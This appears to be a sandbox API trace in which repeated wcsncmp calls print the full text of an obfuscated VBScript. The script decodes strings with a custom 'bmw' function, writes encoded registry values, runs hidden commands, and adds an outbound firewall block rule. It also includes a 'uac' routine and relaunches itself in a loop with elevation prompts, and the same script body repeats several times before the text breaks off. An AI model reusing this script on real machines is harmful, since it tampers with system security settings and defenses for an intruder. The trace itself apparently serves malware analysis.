WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.298] wcsncmp (_String1="65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0226.298] wcsncmp (_String1="5\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0226.298] wcsncmp (_String1="\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.298] wcsncmp (_String1="\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 